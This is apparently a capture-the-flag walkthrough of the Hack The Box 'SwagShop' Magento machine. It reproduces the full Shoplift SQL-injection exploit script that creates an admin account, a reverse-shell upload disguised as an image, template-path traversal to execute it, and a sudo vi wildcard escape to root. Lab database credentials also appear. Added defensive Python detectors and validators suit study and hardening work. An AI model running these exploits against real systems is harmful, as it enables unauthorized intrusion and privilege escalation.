SwagShop

Reconnaissance: NMAP

┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.10.140   

22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 b6:55:2b:d2:4e:8f:a3:81:72:61:37:9a:12:f6:24:ec (RSA)
|   256 2e:30:00:7a:92:f0:89:30:59:c1:77:56:ad:51:c0:ba (ECDSA)
|_  256 4c:50:d5:f2:70:c5:fd:c4:b2:f0:bc:42:20:32:64:34 (ED25519)

80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Did not follow redirect to http://swagshop.htb/
Aggressive OS guesses: Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.0 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.23 seconds
┌──(kali💀kali)-[~]
└─$ sudo nmap -sU -O 10.10.10.140    

68/udp open|filtered dhcpc
Too many fingerprints match this host to give specific OS details
Network Distance: 2 hops

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1042.92 seconds
┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -p- 10.10.10.140

Enumeration: SSH 22/tcp

OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)

Enumeration: HTTP 80/tcp

I always start by enumerating HTTP. Visit the web application.

┌──(kali💀kali)-[~]
└─$ sudo nano /etc/hosts  
10.10.10.140    swagshop.htb
http://swagshop.htb/
Apache httpd 2.4.29 ((Ubuntu))

http://swagshop.htb/index.php/
http://swagshop.htb/index.php/?SID=736l08tv4jbargk0md6vs8aqt0about-magento-demo-store/
http://swagshop.htb/index.php/5-x-hack-the-box-sticker.html?SID=736l08tv4jbargk0md6vs8aqt0

http://swagshop.htb/index.php/review/product/list/id/3/#review-form
http://swagshop.htb/index.php/sales/guest/form/?SID=736l08tv4jbargk0md6vs8aqt0

http://swagshop.htb/index.php/customer/account/login/
http://swagshop.htb/index.php/customer/account/create/

http://swagshop.htb/index.php/catalog/seo_sitemap/category/?SID=736l08tv4jbargk0md6vs8aqt0

Gobuster:

┌──(kali💀kali)-[~]
└─$ gobuster dir -u http://swagshop.htb/index.php/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20 -x php,txt,html

/home                 (Status: 200) [Size: 16591]
/0                    (Status: 200) [Size: 16593]
/contacts             (Status: 200) [Size: 15600]
/catalog              (Status: 302) [Size: 0] [--> http://swagshop.htb/index.php/]
/admin                (Status: 200) [Size: 3609]
/Home                 (Status: 200) [Size: 16591]
/core                 (Status: 200) [Size: 0]
/install              (Status: 302) [Size: 0] [--> http://swagshop.htb/index.php/]
/cms                  (Status: 200) [Size: 16593]
/api                  (Status: 200) [Size: 361]
/checkout             (Status: 302) [Size: 0] [--> http://swagshop.htb/index.php/checkout/onepage/]
/wishlist             (Status: 302) [Size: 0] [--> http://swagshop.htb/index.php/customer/account/login/]
/HOME                 (Status: 200) [Size: 16591]
/customer-service     (Status: 200) [Size: 19801]

Nikto:

┌──(kali💀kali)-[~/Desktop]
└─$ nikto -h http://10.10.10.140

+ Server: Apache/2.4.29 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ Root page / redirects to: http://swagshop.htb/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /favicon.ico: identifies this app/server as: Magento Go CMS. See: https://en.wikipedia.org/wiki/Favicon
+ /app/: Directory indexing found.
+ /app/: This might be interesting.
+ /includes/: Directory indexing found.
+ /includes/: This might be interesting.
+ /lib/: Directory indexing found.
+ /lib/: This might be interesting.
+ /install.php: install.php file found.
+ /LICENSE.txt: License file found may identify site software.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /RELEASE_NOTES.txt: A database error may reveal internal details about the running database.
+ /RELEASE_NOTES.txt: Magento Shop Changelog identified.
+ /skin/adminhtml/default/default/media/editor.swf: Several Adobe Flash files that ship with Magento are vulnerable to DOM based Cross Site Scripting (XSS). See: https://appcheck-ng.com/unpatched-vulnerabilites-in-magento-e-commerce-platform/
+ /skin/adminhtml/default/default/media/uploader.swf: Several Adobe Flash files that ship with Magento are vulnerable to DOM based Cross Site Scripting (XSS). See: https://appcheck-ng.com/unpatched-vulnerabilites-in-magento-e-commerce-platform/
+ /skin/adminhtml/default/default/media/uploaderSingle.swf: Several Adobe Flash files that ship with Magento are vulnerable to DOM based Cross Site Scripting (XSS). See: https://appcheck-ng.com/unpatched-vulnerabilites-in-magento-e-commerce-platform/
+ /var/: Directory indexing found.
+ /var/: /var directory has indexing enabled.
+ 8060 requests: 1 error(s) and 20 item(s) reported on remote host
+ End Time:           2024-01-09 00:17:56 (GMT-5) (5655 seconds)
view-source:http://swagshop.htb/index.php/
<!--[if lt IE 7]>
<script type="text/javascript">
//<![CDATA[
    var BLANK_URL = 'http://swagshop.htb/js/blank.html';
    var BLANK_IMG = 'http://swagshop.htb/js/spacer.gif';
//]]>
</script>
<![endif]-->

<!--[if  (lte IE 8) & (!IEMobile)]>
<link rel="stylesheet" type="text/css" href="http://swagshop.htb/skin/frontend/rwd/default/css/styles-ie8.css" media="all" />
<link rel="stylesheet" type="text/css" href="http://swagshop.htb/skin/frontend/rwd/default/css/madisonisland-ie8.css" media="all" />
<![endif]-->
<!--[if (gte IE 9) | (IEMobile)]><!-->

Magento

It’s running Magento, an open-source e-commerce platform written in PHP. Since it is off-the-shelf software, we’ll probably find reported vulnerabilities associated with it. But first, we need a version number. Notice that the bottom of the page has a copyright notice for the year 2014, which is 6 years ago, so it’s very likely to be vulnerable. Just as there is a scanner for WordPress applications (WPScan), there is one for Magento applications called Mage Scan. Let’s use it to scan the application.

Mage Scan: Scan a Magento site for information

git clone https://github.com/steverobbins/magescan magescan
cd magescan
curl -sS https://getcomposer.org/installer | php
php composer.phar install
bin/magescan scan:all www.example.com
$ magescan.phar scan:all store.example.com
php magescan.phar -vvv scan:all 10.10.10.140 > output

-vvv: increase the verbosity to level 3
scan:all: run all scans

| Edition   | Community        |
| Version   | 1.9.0.0, 1.9.0.1 |

| Path                                    | Response Code | Pass   |
| app/etc/local.xml                       | 200           | Fail   |
| index.php/rss/order/NEW/new             | 200           | Fail   |
| shell/                                  | 200           | Fail   |

It reports the version as 1.9.0.0 or 1.9.0.1, Community edition. There are no installed modules, so if we find public vulnerabilities associated with modules, we can discard them. As for the unreachable path check, the last two paths don’t give us anything useful. However, the first path gives us an XML file that leaks the swagshop MySQL database username and password.

<host><![CDATA[localhost]]></host>
<username><![CDATA[root]]></username>
<password><![CDATA[fMVWh7bDHpgZkyfqQXreTjU9]]></password>
<dbname><![CDATA[swagshop]]></dbname>

This might come in handy later. Next, let’s run searchsploit.

┌──(kali💀kali)-[~/Desktop]
└─$ searchsploit magento
eBay Magento 1.9.2.1 - PHP FPM XML eXternal Entity Injection   | php/webapps/38573.txt
eBay Magento CE 1.9.2.1 - Unrestricted Cron Script (Code Execu | php/webapps/38651.txt
Magento 1.2 - '/app/code/core/Mage/Admin/Model/Session.php?log | php/webapps/32808.txt
Magento 1.2 - '/app/code/core/Mage/Adminhtml/controllers/Index | php/webapps/32809.txt
Magento 1.2 - 'downloader/index.php' Cross-Site Scripting      | php/webapps/32810.txt
Magento < 2.0.6 - Arbitrary Unserialize / Arbitrary Write File | php/webapps/39838.php
Magento CE < 1.9.0.1 - (Authenticated) Remote Code Execution   | php/webapps/37811.py
Magento eCommerce - Local File Disclosure                      | php/webapps/19793.txt
Magento eCommerce - Remote Code Execution                      | xml/webapps/37977.py
Magento eCommerce CE v2.3.5-p2 - Blind SQLi                    | php/webapps/50896.txt
Magento Server MAGMI Plugin - Multiple Vulnerabilities         | php/webapps/35996.txt
Magento Server MAGMI Plugin 0.7.17a - Remote File Inclusion    | php/webapps/35052.txt
Magento WooCommerce CardGate Payment Gateway 2.0.30 - Payment  | php/webapps/48135.php

The first three exploits don’t match our version, so we’ll ignore them. The next two might be useful. Since Mage Scan didn’t report plugins, we’ll ignore the plugin vulnerabilities. The two after that might be relevant to our version. Lastly, we’ll also ignore the eBay Magento exploits.

We narrowed our exploits down to four possible options: 39838, 37811, 19793 and 37977. We’ll start by looking into exploit 37977 because it doesn’t require authentication and it is an RCE vulnerability.

Shell as www-data

Copy the exploit to our current directory.

┌──(kali💀kali)-[~/Desktop]
└─$ searchsploit -m 37977
  Exploit: Magento eCommerce - Remote Code Execution
      URL: https://www.exploit-db.com/exploits/37977
     Path: /usr/share/exploitdb/exploits/xml/webapps/37977.py
    Codes: CVE-2015-1397, OSVDB-121260
 Verified: False
File Type: ASCII text
Copied to: /home/kali/Desktop/37977.py

-m: mirror an exploit to the current working directory.

After skimming through the code of the exploit, it seems to chain several SQL injection vulnerabilities together that eventually create an administrative account on the system with the username/password forme/forme.

To get the code working on our application, we need to make a few changes:

  1. Remove the explanatory text that is not commented out (or the interpreter will fail with syntax errors).

  2. Change the target variable to http://10.10.10.140/

  3. Change the username/password to random/random (optional).

Run the exploit.

┌──(kali💀kali)-[~/Desktop]
└─$ python 37977.py
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
DID NOT WORK

It didn’t work and it doesn’t give us much of an explanation why. So let’s redirect all the traffic from the script to Burp. To do that, perform the following steps.

  • In Burp, visit Proxy > Options > Proxy Listeners > Add. In the Binding tab, set the Bind port to 8081, and in the Request Handling tab, set the Redirect to host option to 10.10.10.140 and the Redirect to Port option to 80. Make sure to select the newly added listener once you’re done.

  • Go back to the script and change the target to http://localhost:8081

  • In Burp set intercept to be on.

This way all of the script’s traffic goes through Burp first. Run the script again and send the request to Repeater, then execute it there. As shown in the above image, the script is failing because the URL is not found. Let’s try it in our browser.

http://localhost:8081/admin

Doesn’t work. Let’s visit other links in the website and see how the URL changes. If we click on the Hack the Box sticker we get the following link.

http://10.10.10.140/index.php/5-x-hack-the-box-sticker.html

It seems to be appending index.php to all the URLs. Let’s add that in our script. So now our target would be:

http://localhost:8081/index.php

http://swagshop.htb/app/etc/local.xml
<config>
<global>
<install>
<date>Wed, 08 May 2019 07:23:09 +0000</date>
</install>
<crypt>
<key>b355a9e0cd018d3f7f03607141518419</key>
</crypt>
<disable_local_modules>false</disable_local_modules>
<resources>
<db>
<table_prefix></table_prefix>
</db>
<default_setup>
<connection>
<host>localhost</host>
<username>root</username>
<password>fMVWh7bDHpgZkyfqQXreTjU9</password>
<dbname>swagshop</dbname>
<initStatements>SET NAMES utf8</initStatements>
<model>mysql4</model>
<type>pdo_mysql</type>
<pdoType></pdoType>
<active>1</active>
</connection>
</default_setup>
</resources>
<session_save>files</session_save>
</global>
<admin>
<routers>
<adminhtml>
<args>
<frontName>admin</frontName>
</args>
</adminhtml>
</routers>
</admin>
</config>

Username: root
Password: fMVWh7bDHpgZkyfqQXreTjU9
Key: b355a9e0cd018d3f7f03607141518419
FrontName: admin
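What an exposed local.xml hands out can be audited automatically, and a scanner should report it without echoing the secrets into its own logs. The Python below is an added example written for this write-up, not code from the box, from Magento or from Mage Scan; audit_local_xml and redact are constructed here, and the sample file has the same layout as the local.xml above but placeholder values instead of the real password and key.

```python
import xml.etree.ElementTree as ET

# Constructed sample with the same layout as the leaked app/etc/local.xml;
# the secret values are placeholders, not the ones from the box.
SAMPLE_LOCAL_XML = """<config>
  <global>
    <crypt>
      <key><![CDATA[0123456789abcdef0123456789abcdef]]></key>
    </crypt>
    <resources>
      <default_setup>
        <connection>
          <host><![CDATA[localhost]]></host>
          <username><![CDATA[root]]></username>
          <password><![CDATA[DB_PASSWORD_PLACEHOLDER]]></password>
          <dbname><![CDATA[swagshop]]></dbname>
        </connection>
      </default_setup>
    </resources>
  </global>
  <admin>
    <routers>
      <adminhtml>
        <args>
          <frontName>admin</frontName>
        </args>
      </adminhtml>
    </routers>
  </admin>
</config>
"""


def redact(secret):
    """Keep a two-character prefix so findings can be correlated without logging the secret."""
    return secret[:2] + "*" * (len(secret) - 2) + " (%d chars)" % len(secret)


def audit_local_xml(xml_text):
    """Return a list of findings for a Magento 1 local.xml that a client was able to fetch."""
    root = ET.fromstring(xml_text)
    findings = []

    conn = root.find("./global/resources/default_setup/connection")
    if conn is not None:
        host = conn.findtext("host", default="")
        user = conn.findtext("username", default="")
        password = conn.findtext("password", default="")
        dbname = conn.findtext("dbname", default="")
        if password:
            findings.append("database credentials exposed: %s@%s/%s password=%s"
                            % (user, host, dbname, redact(password)))
        if user == "root":
            findings.append("application connects to MySQL as root; use a least-privilege DB account")

    key = root.findtext("./global/crypt/key", default="")
    if key:
        findings.append("crypt key exposed: %s; it protects encrypted config values, so rotate it"
                        % redact(key))

    front_name = root.findtext("./admin/routers/adminhtml/args/frontName", default="")
    if front_name == "admin":
        findings.append("admin frontName is the default 'admin'; the panel path is trivially guessable")

    return findings


if __name__ == "__main__":
    for finding in audit_local_xml(SAMPLE_LOCAL_XML):
        print("-", finding)
```

The fix on the server side is to make sure the web server refuses requests for anything under app/ (Magento ships an .htaccess for this, which only works when AllowOverride is enabled) and to rotate both the database password and the crypt key once the file has been served even once.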

I noticed that the admin panel is at http://swagshop.htb/index.php/admin and not at http://swagshop.htb/admin, so I changed the script a bit:

##################################################################################################
#Exploit Title : Magento Shoplift exploit (SUPEE-5344)
#Author        : Manish Kishan Tanwar AKA error1046
#Date          : 25/08/2015
#Love to       : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,Jagriti,Kishan Singh and ritu rathi
#Debugged At  : Indishell Lab(originally developed by joren)
##################################################################################################
import requests
import base64
import sys

target = "http://swagshop.htb/index.php/"

if not target.startswith("http"):
    target = "http://" + target

if target.endswith("/"):
    target = target[:-1]

target_url = target + "/admin/Cms_Wysiwyg/directive/index/"

q="""
SET @SALT = 'rp';
SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{password}') ), CONCAT(':', @SALT ));
SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;
INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Firstname','Lastname','email@example.com','{username}',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());
INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '{username}'),'Firstname');
"""


query = q.replace("\n", "").format(username="forme", password="forme")
pfilter = "popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);{0}".format(query)

# e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ decoded is{{block type=Adminhtml/report_search_grid output=getCsvFile}}
r = requests.post(target_url, 
                  data={"___directive": "e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ",
                        "filter": base64.b64encode(pfilter),
                        "forwarded": 1})
if r.ok:
    print "WORKED"
    print "Check {0}/admin with creds forme:forme".format(target)
else:
    print "DID NOT WORK"

┌──(kali💀kali)-[~/Desktop]
└─$ python 37977.py 
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
WORKED
Check http://swagshop.htb/index.php/admin with creds forme:forme
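From the defender’s side, the request this script sends has a very recognisable shape. The Python below is an added example, not part of the original exploit or of this write-up; inspect_request, decode_filter and the two sample requests are all constructed here. It decodes the base64 filter field and flags the stacked SQL statement and the forwarded=1 flag, so it is the kind of check a reverse proxy, WAF or mod_security audit log could apply to POST bodies (the plain Apache access log only shows the path, which is still enough to alert on unauthenticated hits to this endpoint).

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, urlencode

# The admin endpoint abused by CVE-2015-1397 (closed by patch SUPEE-5344); matched case-insensitively
DIRECTIVE_ENDPOINT = "/cms_wysiwyg/directive/index"

# A closing parenthesis, a statement separator and a SQL verb inside the report
# filter is stacked-query injection; no legitimate filter value looks like this.
STACKED_SQL_RE = re.compile(r"\)\s*;\s*(set|select|insert|update|delete|drop)\b", re.IGNORECASE)


def decode_filter(value):
    """The 'filter' form field is base64; return it decoded, or '' if it is not valid base64."""
    try:
        return base64.b64decode(value).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return ""


def inspect_request(method, path, body):
    """Return a list of findings for one HTTP request (method, URL path, form-encoded body)."""
    findings = []
    if DIRECTIVE_ENDPOINT not in path.lower():
        return findings
    findings.append("request to Cms_Wysiwyg directive endpoint (expected only from a logged-in admin)")

    params = parse_qs(body, keep_blank_values=True)
    if params.get("forwarded", [""])[0] == "1":
        findings.append("forwarded=1 set: the flag the exploit uses to skip the admin login check")

    decoded = decode_filter(params.get("filter", [""])[0])
    if "field_expr" in decoded and STACKED_SQL_RE.search(decoded):
        findings.append("stacked SQL statement in the popularity filter")
    if "admin_user" in decoded.lower():
        findings.append("filter references the admin_user table (admin account creation)")
    return findings


# Constructed sample traffic: a normal storefront request and a request shaped like the one above.
# The directive value here is base64 of "{}", a placeholder rather than the real block directive.
BENIGN = ("GET", "/index.php/catalog/seo_sitemap/category/", "")
MALICIOUS_FILTER = base64.b64encode(
    b"popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);"
    b"INSERT INTO admin_user (username) VALUES ('sample')"
).decode()
MALICIOUS = ("POST", "/index.php/admin/Cms_Wysiwyg/directive/index/",
             urlencode({"___directive": "e30=", "filter": MALICIOUS_FILTER, "forwarded": "1"}))

if __name__ == "__main__":
    for req in (BENIGN, MALICIOUS):
        print(req[0], req[1], "->", inspect_request(*req) or ["clean"])
```

Detection is a stop-gap; the real fix is applying SUPEE-5344 (or upgrading), after which the forwarded flag no longer bypasses authentication and the filter is no longer concatenated into SQL.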

Let’s log in to Magento using the following credentials:

http://swagshop.htb/index.php/admin/dashboard/index/key/036b971b8fcdc35f6c2d665a253c1550/

http://swagshop.htb/index.php/admin
Username: forme
Password: forme

Now we are in the Magento Admin Panel. There are several ways to get a shell from here, but we decided to use the “Froghopper” attack, which is a file upload attack. It got its name from the Pepe frog image the exploit’s author used as a meme to get the shell. Uploaded files are not accessible in their raw form, which prevents us from executing them. This can be bypassed by allowing symlinks in Developer Settings (System > Configuration > Developer > Template Settings).

Magento has a built-in feature that restricts file extensions which could cause harm, so all it allows are PNG, JPG, GIF, etc. The protection mechanism checks the header and the extension but not the contents of the file being uploaded. This means we can craft the payload so that it passes the check and is uploaded to the target system. Hence, we took the reverse shell script and added GIF98 at the top so it could be uploaded.

GIF98

Now we create a new category named Demo. It needs to be active for the payload to work. Then upload the reverse shell script with a double extension as shown in the image below.

(New Category form: Name = Demo, Is Active = Yes, Image = php-reverse-shell.php.png)

Now proceed to the Newsletter section and click Add New Template. Fill in the form with dummy details, and in the text field add the path to the template, i.e. the reverse shell script, as shown below.

{{block type='core/template' template='../../../../../../media/catalog/category/shell.php.png'}}

Back in the Newsletter Templates section, we see that our newly created newsletter is visible. Before executing it, we start a listener on the port specified in the reverse shell. Then we Preview the newsletter template as shown in the image below.
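The check the write-up bypasses (signature plus extension) is weak because it never looks past the first few bytes. The Python below is an added example for this section, not code from Magento or from the Froghopper write-up; validate_upload, walk_gif and the sample files are constructed here. It rejects double extensions, checks the signature (the real GIF signatures are GIF87a and GIF89a), and for GIF files walks the complete block structure to the trailer, so a script with a GIF signature prepended, as in the write-up, and a script appended after a genuine image are both refused.

```python
import os

# Allowed image types and the signature a file of that type must start with
SIGNATURES = {
    "gif": (b"GIF87a", b"GIF89a"),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
}


class _GifReader:
    """Cursor over the bytes that fails loudly when a structure runs past the end."""

    def __init__(self, data):
        self.data, self.pos = data, 0

    def take(self, n):
        if self.pos + n > len(self.data):
            raise ValueError("GIF truncated at offset %d" % self.pos)
        chunk = self.data[self.pos:self.pos + n]
        self.pos += n
        return chunk

    def skip_sub_blocks(self):
        # Data sub-blocks: one length byte followed by that many bytes, ended by a zero length
        while True:
            size = self.take(1)[0]
            if size == 0:
                return
            self.take(size)


def walk_gif(data):
    """Parse the whole GIF block structure; raise ValueError if anything is not a GIF."""
    r = _GifReader(data)
    r.take(6)                       # header (signature already checked by the caller)
    screen = r.take(7)              # logical screen descriptor
    if screen[4] & 0x80:            # global colour table present: 3 * 2^(N+1) bytes
        r.take(3 * (2 << (screen[4] & 0x07)))
    while True:
        introducer = r.take(1)[0]
        if introducer == 0x3B:      # trailer
            break
        if introducer == 0x21:      # extension block
            r.take(1)               # label
            r.skip_sub_blocks()
        elif introducer == 0x2C:    # image descriptor
            desc = r.take(9)
            if desc[8] & 0x80:      # local colour table present
                r.take(3 * (2 << (desc[8] & 0x07)))
            r.take(1)               # LZW minimum code size
            r.skip_sub_blocks()
        else:
            raise ValueError("unexpected block introducer 0x%02x at offset %d" % (introducer, r.pos - 1))
    if r.pos != len(data):
        raise ValueError("%d bytes after the GIF trailer" % (len(data) - r.pos))


def validate_upload(filename, data):
    """Return (accepted, reason). Extension, signature and, for GIF, the full structure are checked."""
    parts = os.path.basename(filename).split(".")
    if len(parts) != 2 or not parts[0]:
        return False, "filename must be name.ext with exactly one extension"
    ext = parts[1].lower()
    if ext not in SIGNATURES:
        return False, "extension %r not allowed" % ext
    if not any(data.startswith(sig) for sig in SIGNATURES[ext]):
        return False, "content does not start with a %s signature" % ext
    if ext == "gif":
        try:
            walk_gif(data)
        except ValueError as err:
            return False, "not a well-formed GIF: %s" % err
    return True, "accepted as %s" % ext


# Constructed samples: a genuine 1x1 GIF, and two non-images that pass a signature-only check
REAL_GIF = (b"GIF89a" + b"\x01\x00\x01\x00\x80\x00\x00" + b"\x00\x00\x00\xff\xff\xff"
            + b"\x2c\x00\x00\x00\x00\x01\x00\x01\x00\x00" + b"\x02\x02\x44\x01\x00" + b"\x3b")
PHP_TEXT = b"<?php /* constructed placeholder, not a payload */ ?>"
FAKE_GIF = b"GIF89a" + PHP_TEXT          # signature prepended to a script, as in the write-up
POLYGLOT = REAL_GIF + PHP_TEXT           # script appended after a real image

if __name__ == "__main__":
    for name, blob in (("pepe.gif", REAL_GIF), ("shell.php.gif", FAKE_GIF),
                       ("shell.gif", FAKE_GIF), ("pepe.gif", POLYGLOT)):
        print(name, validate_upload(name, blob))
```

PNG and JPEG only get the signature check in this example, and even a structurally valid GIF can carry arbitrary bytes inside a comment extension, so structural validation is a screen rather than a guarantee. The controls that actually close the Froghopper path are re-encoding every uploaded image server-side, storing uploads where the web server never executes PHP, and leaving the symlink template setting off.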

┌──(kali💀kali)-[~/Desktop]
└─$ nc -nlvp 5555
listening on [any] 5555 ...
connect to [10.10.16.4] from (UNKNOWN) [10.10.10.140] 37208
Linux swagshop 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
 06:40:04 up  9:34,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)

$ whoami
www-data

$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@swagshop:/$ 

www-data@swagshop:/$ cd /home/haris
www-data@swagshop:/home/haris$ cat user.txt
3a79acc----------------------------

Privesc to root

We checked the sudo permissions and found that we can run vi as root, but only on paths under /var/www/html/. We can use vi to edit index.php inside /var/www/html.

www-data@swagshop:/home/haris$ sudo -l
Matching Defaults entries for www-data on swagshop:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on swagshop:
    (root) NOPASSWD: /usr/bin/vi /var/www/html/*
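The sudo rule above fails in two independent ways, and both are mechanical enough to lint for. The Python below is an added example, not from the write-up or from GTFOBins; audit_rule, audit_sudo_l and the sample output are constructed here. It parses the rule lines of sudo -l output and flags editors with shell escapes, wildcard arguments (sudo matches a wildcard against the raw argument string, so a path containing .. and extra space-separated options both satisfy the pattern) and NOPASSWD grants to root.

```python
import re

# Programs that can run a shell or read/write arbitrary files from inside the program itself
SHELL_ESCAPE_BINARIES = {"vi", "vim", "nano", "less", "more", "man", "awk", "find", "perl",
                         "python", "python3"}

# One entry as printed by `sudo -l`: "(runas) TAG: TAG: /path/to/command args"
RULE_RE = re.compile(r"^\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<command>.+)$")


def audit_rule(rule):
    """Return findings for one sudo rule line, or None if the line is not a rule."""
    m = RULE_RE.match(rule.strip())
    if not m:
        return None
    runas = m.group("runas").strip()
    tags = {t.strip(": ") for t in m.group("tags").split()}
    argv = m.group("command").split()
    binary = argv[0].rsplit("/", 1)[-1]
    findings = []

    if argv == ["ALL"]:
        findings.append("unrestricted command list")
    if binary in SHELL_ESCAPE_BINARIES:
        findings.append("%s can spawn a shell as %s from inside the program" % (binary, runas))
    for arg in argv[1:]:
        if "*" in arg or "?" in arg:
            findings.append("wildcard argument %r: matched against the raw string, so '..' "
                            "traversal and appended space-separated options also match" % arg)
            break
    if "NOPASSWD" in tags and runas in ("root", "ALL"):
        findings.append("NOPASSWD as %s: any code running as this user gets root with no credential"
                        % runas)
    return findings


def audit_sudo_l(output):
    """Audit every rule in `sudo -l` output; returns {rule line: [findings]}."""
    results = {}
    in_rules = False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if in_rules and line.strip().startswith("("):
            results[line.strip()] = audit_rule(line)
    return results


# Constructed sample patterned on the `sudo -l` output above, plus one tightly scoped rule
SAMPLE_SUDO_L = """Matching Defaults entries for www-data on swagshop:
    env_reset, mail_badpass

User www-data may run the following commands on swagshop:
    (root) NOPASSWD: /usr/bin/vi /var/www/html/*
    (root) /bin/cat /var/log/apache2/access.log
"""

if __name__ == "__main__":
    for rule, findings in audit_sudo_l(SAMPLE_SUDO_L).items():
        print(rule)
        for finding in findings or ["no findings"]:
            print("   -", finding)
```

A rule that needs a web-server user to edit files under the docroot is better expressed with sudoedit on an explicit list of files, or replaced by a deployment step that runs as the file owner rather than as root; an editor plus a wildcard is equivalent to granting root.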

Read Flag:

The fastest path to the flag is just to open it with vi. Based on the sudo output above, I’ll run:

sudo /usr/bin/vi /var/www/html/../../../root/root.txt

Shell:

Great! Searching GTFOBins I found this.

sudo /usr/bin/vi /var/www/html/* -c ':!/bin/sh' /dev/null

# whoami
root

# python3 -c 'import pty; pty.spawn("/bin/bash")'
root@swagshop:/# 

root@swagshop:/# cat /root/root.txt
70a031-------------------------------
